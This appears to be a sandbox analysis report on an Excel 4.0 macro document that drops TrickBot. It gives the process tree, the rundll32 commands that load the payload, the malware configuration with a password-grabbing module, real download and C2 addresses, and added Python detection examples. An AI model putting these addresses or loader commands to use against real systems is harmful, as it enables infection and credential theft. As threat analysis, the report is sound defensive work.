
Analysis Report Sign-1870635479_637332644.xls

Overview

General Information

Sample Name: Sign-1870635479_637332644.xls
Analysis ID: 355634
MD5: ecd29fe79bd4e7f1bae3ccd26f44397c
SHA1: a4e2f0650ac7b4642d43e0c0fbae293ce77a7a40
SHA256: 77500283a6b0da3b616525a210b9fb82ab4dfde174a48ce4bad593c722a6cbb4
Tags: SilentBuilder, TrickBot, DocuSign, Rackspace, xls

Detection

Hidden Macro 4.0 Trickbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Adds / modifies Windows certificates
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1696 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2540 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 1976 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2832 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • taskeng.exe (PID: 1192 cmdline: taskeng.exe {C999D15C-7BEE-4793-989A-0EF4E6A22007} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • rundll32.exe (PID: 1520 cmdline: C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"gtag": "rob60", "C2 list": [], "modules": ["pwgrab", "mcconf"]}

Yara Overview

Initial Sample

Source: Sign-1870635479_637332644.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
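
The $Auto_Open string above is a BIFF8 NAME (Lbl) record: record id 0x0018, length 0x17, grbit 0x0020 (fBuiltin set), a one-character name whose single byte is the built-in name id 0x01 (Auto_Open), followed by a 7-byte ptgRef3d formula pointing at the macro sheet. The Python below is an added illustration, not part of the Joe Sandbox report or of the rule's own code: it reproduces the rule's three conditions against a constructed workbook fragment, but decodes the Lbl fields instead of matching one fixed byte string, so an Auto_Close name or a name with the fHidden bit set (which the fixed string would miss) is still reported. The sample bytes are built inline and are not the analysed file.

```python
import struct
from typing import Dict, List

# Byte strings copied from the SUSP_Excel4Macro_AutoOpen matches above.
CFB_MAGIC = bytes.fromhex("D0 CF 11 E0")
YARA_AUTO_OPEN = bytes.fromhex("18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A")

BIFF_LBL = 0x0018            # BIFF NAME (Lbl) record: defines a workbook name
GRBIT_HIDDEN = 0x0001        # fHidden: name not shown in the Name Manager
GRBIT_BUILTIN = 0x0020       # fBuiltin: the 1-byte name is a built-in id
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close"}


def lbl_record(grbit: int, builtin_id: int) -> bytes:
    """Build a minimal BIFF8 Lbl record for a built-in name (constructed test data).

    Layout: grbit(2) chKey(1) cch(1) cce(2) ixals(2) itab(2) cchCustMenu(1)
    cchDescription(1) cchHelptopic(1) cchStatustext(1) name(1+cch) rgce(cce).
    """
    rgce = b"\x3A" + b"\x00" * 6                        # ptgRef3d + 6-byte operand
    body = struct.pack("<HBBHHHBBBB", grbit, 0, 1, len(rgce), 0, 0, 0, 0, 0, 0)
    body += b"\x00" + bytes([builtin_id]) + rgce        # string flags, built-in id, formula
    return struct.pack("<HH", BIFF_LBL, len(body)) + body


def find_autorun_names(data: bytes) -> List[Dict]:
    """Scan raw bytes for Lbl records defining Auto_Open / Auto_Close."""
    hits = []
    pos = data.find(b"\x18\x00")
    while 0 <= pos <= len(data) - 4:
        rec_len = struct.unpack_from("<H", data, pos + 2)[0]
        body = data[pos + 4 : pos + 4 + rec_len]
        if rec_len >= 16 and len(body) == rec_len:
            grbit, _chkey, cch, cce = struct.unpack_from("<HBBH", body, 0)
            str_flags, name_id = body[14], body[15]
            if grbit & GRBIT_BUILTIN and cch == 1 and str_flags == 0 and name_id in BUILTIN_NAMES:
                hits.append({
                    "offset": pos,
                    "name": BUILTIN_NAMES[name_id],
                    "hidden": bool(grbit & GRBIT_HIDDEN),
                    "formula_len": cce,
                })
        pos = data.find(b"\x18\x00", pos + 1)
    return hits


def scan_workbook(data: bytes) -> Dict:
    """Reproduce the rule's conditions and decode what the Lbl match means."""
    names = find_autorun_names(data)
    return {
        "cfb_header": data[:4] == CFB_MAGIC,
        "excel_marker": b"Excel" in data,
        "autorun_names": names,
        "suspicious": data[:4] == CFB_MAGIC and bool(names),
    }


def build_sample() -> bytes:
    """Constructed input, not the analysed file: a 512-byte CFB header, the
    'Excel' marker, the exact Auto_Open record from the rule, and a hidden
    Auto_Close record that the fixed Yara string would not match."""
    header = CFB_MAGIC + bytes.fromhex("A1 B1 1A E1") + b"\x00" * 504
    return (header + b"Excel" + b"\x00" * 11
            + lbl_record(GRBIT_BUILTIN, 0x01)
            + b"\x00" * 8
            + lbl_record(GRBIT_BUILTIN | GRBIT_HIDDEN, 0x02))


if __name__ == "__main__":
    for hit in scan_workbook(build_sample())["autorun_names"]:
        print(hit)
```

Like the Yara rule, this scans the raw file rather than the Workbook stream inside the OLE container, so a record that straddles a sector boundary in a fragmented stream can be missed; for anything beyond triage, extract the Workbook stream first (for example with the olefile library) and scan that. The "Hidden Macro 4.0" verdict at the top of this report refers to the macro sheet's hidden state, which lives in the BOUNDSHEET record, not in the name flags decoded here.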

Memory Dumps

Rule: JoeSecurity_TrickBot_4; Description: Yara detected Trickbot; Author: Joe Security
Sources:
  • 00000004.00000002.2098758914.0000000000230000.00000040.00000001.sdmp
  • 00000004.00000003.2094809366.0000000000324000.00000004.00000001.sdmp
  • 00000004.00000003.2094797786.0000000000324000.00000004.00000001.sdmp
  • 00000004.00000002.2099036393.0000000000878000.00000004.00000001.sdmp
  • 00000004.00000002.2098808409.00000000002F0000.00000004.00000020.sdmp

Unpacked PEs

Rule: JoeSecurity_TrickBot_4; Description: Yara detected Trickbot; Author: Joe Security
Sources:
  • 4.2.rundll32.exe.230000.0.raw.unpack
  • 4.2.rundll32.exe.230000.0.unpack

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 920, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 1696
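
The Sigma match above fires on the parent/child pair alone (EXCEL.EXE spawning rundll32.exe). The process tree in the Startup section carries two further signals worth their own checks: rundll32 is handed a module without a .dll extension (..\BASE.BABAA, later ujBASEmc.rrd), and after persistence is installed the same export is invoked by taskeng.exe from a file under AppData\Roaming. The Python below is an added example, not Joe Sandbox or Sigma code, that applies those three checks to process-creation events constructed from this report's tree (field names follow the Sigma output above; the child-image list is a subset of the public rule's, and taskeng.exe is used as the task-scheduler parent because the sandbox is Windows 7).

```python
import ntpath
import re
from typing import Dict, List, Optional, Tuple

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "outlook.exe", "visio.exe", "eqnedt32.exe")
# Subset of the child images listed by the public Sigma rule.
SHELL_CHILDREN = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "msiexec.exe",
                  "schtasks.exe", "wmic.exe", "certutil.exe")
TASK_SCHEDULER_PARENTS = ("taskeng.exe",)   # Windows 7 task host, as in the tree above

# "rundll32[.exe] <module>,<export>" with the module optionally quoted.
RUNDLL32_RE = re.compile(r"rundll32(?:\.exe)?\s+['\"]?([^,'\"]+?)['\"]?\s*,\s*(\w+)", re.IGNORECASE)

EVENTS = [  # constructed from the process tree in this report, not a real log export
    {"ProcessId": 1696, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\BASE.BABAA,DllRegisterServer",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"ProcessId": 2540, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\BASE.BABAA,DllRegisterServer",
     "ParentImage": r"C:\Windows\System32\rundll32.exe"},
    {"ProcessId": 1520, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer",
     "ParentImage": r"C:\Windows\System32\taskeng.exe"},
    {"ProcessId": 4242, "Image": r"C:\Windows\System32\rundll32.exe",   # benign control event
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def rundll32_module(cmdline: str) -> Optional[Tuple[str, str]]:
    """Return (module path, export name) from a rundll32 command line, or None."""
    m = RUNDLL32_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict) -> List[str]:
    """Apply the three checks to one process-creation event; return the rule names that fire."""
    fired = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])

    # 1. Sigma: Microsoft Office Product Spawning Windows Shell
    if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
        fired.append("office_spawns_shell")

    # 2. rundll32 loading a module whose extension is not .dll
    mod = rundll32_module(event["CommandLine"]) if image == "rundll32.exe" else None
    if mod and ntpath.splitext(mod[0])[1].lower() != ".dll":
        fired.append("rundll32_non_dll_module")

    # 3. rundll32 started by the task scheduler with its module under the roaming profile
    if mod and parent in TASK_SCHEDULER_PARENTS and "\\appdata\\roaming\\" in mod[0].lower():
        fired.append("scheduled_rundll32_from_appdata")
    return fired


def evaluate_all(events: List[Dict]) -> Dict[int, List[str]]:
    return {e["ProcessId"]: evaluate(e) for e in events}


if __name__ == "__main__":
    for pid, rules in evaluate_all(EVENTS).items():
        print(pid, rules or "-")
```

Check 2 is the one that survives a change of lure: the dropped payload keeps a non-DLL name across both the initial and the persisted stage, while the parent process differs. The benign shell32.dll control event shows the extension check alone does not fire on ordinary rundll32 use.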

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.chipmania.it/mails/open.php; Avira URL Cloud: Label: malware
Found malware configuration
Source: wermgr.exe.2832.6.memstr; Malware Configuration Extractor: Trickbot {"gtag": "rob60", "C2 list": [], "modules": ["pwgrab", "mcconf"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes; ReversingLabs: Detection: 41%
Source: C:\Users\user\BASE.BABAA; ReversingLabs: Detection: 41%
Yara detected Trickbot
Source: Yara match; File source: Process Memory Space: wermgr.exe PID: 2832, type: MEMORY
Source: C:\Windows\System32\wermgr.exe; Code function: 6_2_0007BCA0 CryptAcquireContextW,

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown; HTTPS traffic detected: 45.155.173.242:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 176.58.123.25:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2100627167.000000006E419000.00000002.00020000.sdmp, BASE.BABAA.0.dr
Source: C:\Windows\System32\wermgr.exe; Code function: 6_2_00061290 FindFirstFileW,
Source: C:\Windows\System32\wermgr.exe; Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\wermgr.exe; Code function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW,

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: 10[1].jjkes.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe
Source: excel.exe; Memory has grown: Private usage: 4MB later: 48MB
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then movzx ecx, word ptr [eax+02h]
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then mov ecx, 00004E20h
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then movzx edx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then inc dword ptr [esp+40h]
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then inc ecx
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec ecx
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then movzx eax, byte ptr [ebx]
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then inc esp
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then dec eax
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then inc edx
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then movzx ebx, word ptr [eax]
Source: C:\Windows\System32\wermgr.exe; Code function: 4x nop then mov ebx, edx
Source: global traffic; DNS query: name: www.chipmania.it
Source: global traffic; TCP traffic: 192.168.2.22:49166 -> 45.155.173.242:443
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.22:49166 -> 45.155.173.242:443
Source: Traffic; Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49170 -> 193.8.194.96:443
Source: Traffic; Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49170
Source: Traffic; Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49173
Source: Traffic; Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.22:49174 -> 5.202.150.151:447
Source: global traffic; TCP traffic: 192.168.2.22:49174 -> 5.202.150.151:447
Source: global traffic; TCP traffic: 192.168.2.22:49176 -> 103.220.47.220:447
Source: Joe Sandbox View; IP Address: 45.155.173.242
Source: Joe Sandbox View; IP Address: 5.202.150.151
Source: Joe Sandbox View; IP Address: 185.81.0.78
Source: Joe Sandbox View; IP Address: 194.5.249.156
Source: Joe Sandbox View; ASN Name: COMBAHTONcombahtonGmbHDE
Source: Joe Sandbox View; ASN Name: DIDEHABNNETIR
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View; JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
Source: global traffic; HTTP traffic detected:
  GET /mails/open.php HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.chipmania.it
  Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query (connections per destination):
  • 45.155.173.242 (12)
  • 194.5.249.156 (6)
  • 193.8.194.96 (23)
  • 5.202.150.151 (6)
  • 103.220.47.220 (3)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: www.chipmania.it
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.6.dr; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmp; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmp; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c5f3x
Source: wermgr.exe, 00000006.00000003.2218495867.0000000033613000.00000004.00000001.sdmp; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c8
Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmp; String found in binary or memory: http://cps.letsencrypt.org0
Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmp; String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmp; String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: wermgr.exe, 00000006.00000003.2218495867.0000000033613000.00000004.00000001.sdmp; String found in binary or memory: http://crl.microsofv
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en&r
Source: wermgr.exe, 00000006.00000002.2364517634.00000000003D1000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmp; String found in binary or memory: http://r3.i.lencr.org/0;
Source: wermgr.exe, 00000006.00000003.2217176292.0000000033614000.00000004.00000001.sdmp; String found in binary or memory: http://r3.o.lencr.org0
Source: wermgr.exe, 00000006.00000002.2369701585.00000000337A0000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2364456344.0000000000770000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wermgr.exe, 00000006.00000002.2372115954.0000000034180000.00000002.00000001.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000006.00000002.2369701585.00000000337A0000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2364456344.0000000000770000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2101706813.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099318193.0000000001FF7000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2371380931.0000000033D77000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364622522.00000000009C7000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: wermgr.exe, 00000006.00000002.2364517634.00000000003D1000.00000004.00000020.sdmp; String found in binary or memory: https://103.220.47.220:447/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/pwgrab64/
